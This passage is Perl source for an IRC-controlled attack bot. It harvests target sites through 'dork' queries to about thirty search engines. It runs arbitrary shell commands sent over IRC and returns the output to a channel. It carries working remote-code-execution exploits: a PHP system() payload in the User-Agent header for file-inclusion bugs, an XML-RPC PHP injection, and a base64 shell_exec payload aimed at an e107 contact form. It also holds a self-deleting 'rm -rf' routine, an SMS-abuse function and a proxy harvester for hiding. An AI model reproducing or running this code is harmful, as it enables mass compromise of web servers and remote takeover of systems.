if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty)
; }
if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser)
; }
if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@goog
le2); }
if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exal
ead); }
if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@v
irgilio); }
if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot)
; }
if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka)
; }
if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam)
; }
if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tisc
ali); }
if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
@clean = &clean(@total);
#
&msg("$chan","$logo(4@3$engine15)4 Total:15 (".scalar(@total).")4 Clean:15 (".scal
ar(@clean).")");
return @clean;
}
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
if ($res =~ /$reqexp/) { $status = 1 }
return $status;
}
sub get_content() {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);
return $res->content;
}
sub google() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=400; $i+=10){
my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&fil
ter=0&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub rediff() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=500; $i+=10) {
my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($
key)."&iss=&submit=Search&firstres=".$i);
$b = "$i";
my $res = &search_engine_query($search);
if ($res !~ /firstres=$b\'>/) {$i=500;}
while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {
if ($1 !~ /rediff\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub uol() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=500; $i+=10) {
my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key).
"&start=".$i);
my $res = &search_engine_query($search);
if ($res !~ m/<span class=\"next\">pr&#65533;xima<\/span>/){$i=5
00;}
while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
if ($1 !~ /uol\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;

}
sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=500; $i+=10) {
my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&firs
t=".$i."&FORM=PERE");
my $res = &search_engine_query($search);
if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:
/g) {$i=500;}
while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
if ($1 !~ /bing\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub altavista() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=500; $i+=10){
my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&
dis=1&q=".&key($key)."&stq=".$i);
my $res = &search_engine_query($search);
if ($res !~ /target=\"_self\">Succ/) {$i=500;}
while ($res =~ m/<span class=ngrn>(.+?)\//g) {
if ($1 !~ /altavista/){
my $link = $1;
$link =~ s/<//g;
$link =~ s/ //g;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub ask() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=50; $i+=1) {
my $search = ("http://it.ask.com/web?q=".&key($key)."&qsrc=0&o=0&l=dir&q
id=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
my $res = &search_engine_query($search);
if ($res !~ /Successiva/) {$i=50;}
while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
if ($1 !~ /ask\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;

}
sub yahoo(){
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=500; $b+=10) {
my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
if ($1 !~ /yahoo\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub clusty() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=10; $b<=500; $b+=10) {
my $search = ("http://search.yippy.com/search?query=".&key($key)."&input
-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
my $res = &search_engine_query($search);
if ($res !~ /next/) {$b=500;}
while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)
\"><span class=\"title\">/g) {
if ($1 !~ /yippy\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub gutser() {
my @list;
my $key = $_[0];
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($ke
y)."&page=".$b."&osmax=0");
my $res = &search_engine_query($search);
while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub google2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","
az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","c
d","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","co
m.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr
","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is",
"it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","
lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","
com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe"
,"com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com
.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to",
"tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.
ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
for ($b=1; $b<=200; $b+=10) {
my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."
&start=".$b."&sa=N");
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
} return @list;
}
}
sub exalead() {
my @list;
my $key = $_[0];
for ($b=0; $b<=1000; $b+=100) {
my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)
."&elements_per_page=100&start_index=".$b);
my $res = &search_engine_query($search);
if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}
while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {
my $link = $1;
if ($link!~ /exalead/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub lycos() {
my @list;
my $key = $_[0];
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b.
"&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
if ($1 !~ /lycos\.com/){

my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub virgilio() {
my @list;
my $key = $_[0];
for ($b=10; $b<=500; $b+=10) {
my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filt
er=1&site=&lr=&hits=10&offset=".$b);
my $res = &search_engine_query($search);
if ($res =~ m/non ha prodotto risultati/i) {$b=500;}
if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}
while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {
if ($1 !~ /\.virgilio\.it/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub webde() {
my @list;
my $key = $_[0];
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&ke
y($key)."&search=Suche&webRb=countryDE");
my $res = &search_engine_query($search);
if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}
while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {
my $link = $1;
if ($link!~ /suche|web/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub hotbot() {
my @list;
my $key = $_[0];
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searc
hbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E
0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);
if ($res =~ m/had no web result/i) {$b=50;}
while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /hotbot\.com/){
my $link = $1;

my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub aol() {
my @list;
my $key = $_[0];
for ($b=2; $b<=50; $b+=1) {
my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&pag
e=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
if ($1 !~ /aol\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub sapo(){
my @list;
my $key = $_[0];
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=ht
ml&limit=10&location=pt&page=".$b."&q=".&key($key)."&st=local");
my $res = &search_engine_query($search);
if ($res !~ m/Next/i) {$b=50;}
while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
if ($1 !~ /\.sapo\.pt/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub duck() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&t=A&l=en&p=1
&s=".$b."&o=json&dc=".$b."&api=d.js");
my $res = &search_engine_query($search);
if ($res =~ m/No more results/i) {$b=50;}
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /duckduckgo/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}

}
}
return @list;
}
sub lygo() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searc
hbox&tab=web&mode=search&currProv=lygo&page2=".$b."&diktfc=51964BFDE35DFB6914F9E
1E0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);
if ($res =~ m/had no web result/i) {$b=50;}
while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {
if ($1 !~ /hotbot\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub yause() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites
&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
my $res = &search_engine_query($search);
if ($res !~ m/Next/i) {$b=50;}
while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\" onfocus
=/g) {
if ($1 !~ /yauba\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub baidu() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=500; $b+=10) {
my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {
if ($1 !~ /baidu\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}

}
}
return @list;
}
sub kipot() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
if ($1 !~ /qkport\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub gibla() { #mati#
my @list;
my $key = $_[0];
my $hal = "/search?q=".&key($key);
my $search = ("http://www.gigablast.com".$hal);
my $res = &search_engine_query($search);
while ($res =~ m/Next 10 Results/) {
$search = ("http://www.gigablast.com".$hal);
while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
$res = &search_engine_query($search);
}return @list;
}
sub black() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
my $cek = $b+1;
my $res = &search_engine_query($search);
if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}
while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /blekko/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /webcache|query/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub sizuka() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=10; $b<=100; $b+=10) {
my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q="
.&key($key)."&start=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /szukacz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub walla() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p="
.$b);
my $res = &search_engine_query($search);
while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /walla\.co\.il/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub demos() {
my @list;
my $key = $_[0];

my $b = 0;
for ($b=0; $b<=500; $b+=10) {
my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&sta
rt=".$b."&type=next&all=yes");
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /search|dmoz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub rose() {
my @list;
my $key = $_[0];
my $b = 0;
my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl",
"ru");
foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];
for ($b=0; $b<=30; $b+=10) {
my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&
mode=internet&start=".$b."&string=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {
if ($1 !~ /euroseek/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
}return @list;
}
sub seznam() {
my @list;
my $key = $_[0];
for ($b=1; $b<=500; $b+=10) {
my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=Sk
YLl2GXwV0CZZUQcglt&from=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
if ($1 !~ /seznam/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub tiscali() {
my @list;
my $key = $_[0];
for ($b=0; $b<=500; $b+=10) {

my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&
start=".$b."&q=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
if ($1 !~ /tiscali/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub naver() {
my @list;
my $key = $_[0];
for ($b=1; $b<=500; $b+=10) {
my $search = ("http://web.search.naver.com/search.naver?where=webkr&quer
y=".&key($key)."&docid=0&#9001;=all&f=&srcharea=all&st=s&fd=2&start=".$b."&displ
ay=10");
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /naver/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visit{$element}++;
push @cln, $element;
}
return @cln;
}
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/@/\%40/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;

return $dork;
}
sub links() {
my @list;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/$1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push(@list,$link,$host,$hdir);
return @list;
}
sub search_engine_query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ($query eq "") { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80",
Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUs
er-Agent: $uagent\r\n\r\n";
my @pages = <$sock>;
$page = "@pages";
close($sock);
};
return $page;
}
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
if ($cmd =~ /cd (.*)/) {
chdir("$1") || &msg("$path","4,1No such file or directory");
return;
}
elsif ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
my @output = `$cmd 2>&1 3>&1`;
my $c = 0;
foreach my $output (@output) {
$c++;
chop $output;
&msg("$path","$output");
if ($c == 5) { $c = 0; sleep 2; }
}
exit;

}}
}
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
if ($nick eq $admin) { $status = 1; }
return $status;
}
sub SIGN() {
if (($powered !~ /e/)||($mail !~ /com/)) {
print "\nHuangango!!! Hulodu Ngana!! Tak Usah Rubah Lagi Tahede!!!\n\n";
exec("rm -rf $0 && pkill perl");
}
}
sub msg() {
return unless $#_ == 1;
sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}
sub nick() {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub notice() {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub sendSMS {
my $no = $_[0];
my $pesan = $_[1];
my $site = "sms.eligiblestore.com";
my $paths = "/";
my $socksms = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site",PeerP
ort=>"80");
if(!$socksms) {die("gak bisa akses $site port 80\r\n");}
print $socksms "GET $paths http/1.1\r\n";
print $socksms "Host: $site\r\n";
print $socksms "Accept: */*\r\n";
print $socksms "User-Agent: Mozilla Firefox\r\n";
print $socksms "Connection: Close\r\n";
print $socksms "\r\n";
my @data = <$socksms>;
close($socksms);
#$data = join("",@data);
#print $data;
#@spertanyaan1 = split("jawab ini : ",$data);
#print @pertanyaan1[1];
#@spertanyaan2 = split(" =",@spertanyaan1[1]);
#print @spertanyaan2[0];
#@spertanyaan3 = split(" ",@spertanyaan2[0]);
#print "angka1= ".@spertanyaan3[0]."\r\n";
#print "angka2= ".@spertanyaan3[2]."\r\n";
#$jawaban = @spertanyaan3[0]+@spertanyaan3[2];
#print "jawaban = $jawaban\r\n";
#@sguard1 = split("name='mathguard_code' value='",$data);

#print @sguard1[1];
#@sguard2 = split("' /><br />",@sguard1[1]);
#print @sguard2[0];
#$sguard = @sguard2[0];
$action = "/";
$Phonenumbers = $no;
$Text = $pesan;
#$mathguard_answer = $jawaban;
#$mathguard_code = $sguard;
$via = "main";
$TOMBOL = "Submit";
#
$Post = "Phonenumbers=".$Phonenumbers."&Text=".$Text."&mathguard_answer=
".$mathguard_answer."&mathguard_code=".$mathguard_code."&TOMBOL=".$TOMBOL;
$Post = "sendtoext=".$Phonenumbers."&smstext=".$Text."&socket=".$via."&s
ubmit=".$TOMBOL;
$panjang = length $Post;
$socksms = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site",PeerPort
=>"80");
print $socksms "POST $action http/1.1\r\n";
print $socksms "Host: $site\r\n";
print $socksms "Accept: */*\r\n";
print $socksms "User-Agent: Mozilla Firefox\r\n";
print $socksms "Content-type: application/x-www-form-urlencoded\r\n";
print $socksms "Content-length: ".$panjang."\r\n";
print $socksms "Connection: Close\r\n\r\n";
print $socksms $Post;
@hasil = <$socksms>;
close($socksms);
$hasil = join("",@hasil);
if($hasil=~ /SMS sent to/){
return 1;
}
else{
return 0;
}
}
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $chan = $_[2];
my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
$browser->agent("$hie");
$browser->timeout(7);
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
&msg("$chan","15,1(4@9CMDLFI15)9 $1");
} else {
&msg("$chan","15,1(4@9CMDLFI15)4 No Output");
}
}
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $chan = $_[2];

my $userAgent = LWP::UserAgent->new(agent => 'perl post');


$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></v
alue></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content
=> $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","15,1(4@9CMDXML15)9 $1");
} else {
&msg("$chan","15,1(4@9CMDXML15)4 No Output");
}
}
sub cmde107() {
my $path = $_[0];
my $code = $_[1];
my $chan = $_[2];
my $codecmd = encode_base64($code);
my $cmd = 'echo(base64_decode("QWxsRnJlZQ==").shell_exec(base64_decode("aWQ=")).
base64_decode("Z05FVFdPUks=")).shell_exec(base64_decode("'.$codecmd.'"));';
my $req = HTTP::Request->new(POST => $path);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B
%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /gNETWORK(.*)/ ){
$mydata = $1;
&msg("$chan","15,1(4@9CMDe10715)9 $mydata");
}
else { &msg("$chan","15,1(4@9CMDe10715)4 No Output"); }
}
sub proxy() {
my $chan = $_[0];
my $reqip= "$_[1]";
for ($b=0; $b<=5; $b+=1) {
my $siteproxy = ("http://www.xroxy.com/proxylist.php?port=&type=Not_tran
sparent&ssl=ssl&country=&latency=3000&reliability=&sort=latency&desc=&pnum=".$b.
"#table");
$Resul = &get_content($siteproxy);
print $Resul;
while ($Resul =~ m/proxy&host=(.+?)&port=(.+?)&notes/g) {
my $proip = $1;
my $port = $2;
my $scansock = IO::Socket::INET->new(PeerAddr => $proip, PeerPor
t => $port, Proto =>'tcp', Timeout => 2);
if ($scansock && $proip =~ /^$reqip/) {
my $url = 'http://www.cmyip.com/index.php';
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(1);
$ENV{HTTP_proxy} = "http://".$proip.":".$port."/";
$ua->env_proxy;
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req)->content;
delete $ENV{HTTP_PROXY};

if ($res =~ m/Quick and Easy way to SEE my IP ad


dress/g) {
&msg("$chan","15,1(4@9PROXY15)(4@9My-PROXY15) 13Accept $
proip:$port ");
}
}
}
}
&msg("$chan","15,1(4@9PROXY15)13 Checking xroxy Finished");
for ($b=0; $b<=5; $b+=1) {
my $siteproxy = ("http://proxies.my-proxy.com/proxy-list-s".$b.".html");
$Resul = &get_content($siteproxy);
print $Resul;
while ($Resul =~ m/<br>(.+?):(.+?)<br>/g) {
my $proip = $1;
my $port = $2;
my $scansock = IO::Socket::INET->new(PeerAddr => $proip, PeerPor
t => $port, Proto =>'tcp', Timeout => 2);
if ($scansock && $proip =~ /^$reqip/) {
my $url = 'http://www.cmyip.com/index.php';
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(1);
$ENV{HTTP_proxy} = "http://".$proip.":".$port."/";
$ua->env_proxy;
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req)->content;
delete $ENV{HTTP_PROXY};
if ($res =~ m/Quick and Easy way to SEE my IP ad
dress/g) {
&msg("$chan","15,1(4@9PROXY15)(4@13My-Proxy15)13Accept $
proip:$port ");
}
}
}
}
&msg("$chan","15,1(4@9PROXY15)13 Checking my-proxy Finished");
for ($b=0; $b<=5; $b+=1) {
my $siteproxy = ("http://www.cooleasy.com/?act=list&port=&type=elite&cou
ntry=&page=".$b);
$Resul = &get_content($siteproxy);
print $Resul;
while ($Resul =~ m/<td width=170>(.+?)<\/td>/g) {
my $proip = $1;
my @port = ("80","8080","3128");
foreach my $port (@port) {
my $scansock = IO::Socket::INET->new(PeerAddr => $proip,
PeerPort => $port, Proto =>'tcp', Timeout => 2);
if ($scansock && $proip =~ /^$reqip/) {
my $url = 'http://www.cmyip.com/index.php';
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(1);
$ENV{HTTP_proxy} = "http://".$proip.":".$port."/
";
$ua->env_proxy;
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req)->content;
delete $ENV{HTTP_PROXY};
if ($res =~ m/Quick and Easy way to SEE
my IP address/g) {
&msg("$chan","15,1(4@9PROXY15)(4@13CoolEasy15) 1

3Accept $proip:$port ");


}
}
}
}
}
&msg("$chan","9,1(4@9PROXY15)13 Checking cooleasy Finished");
}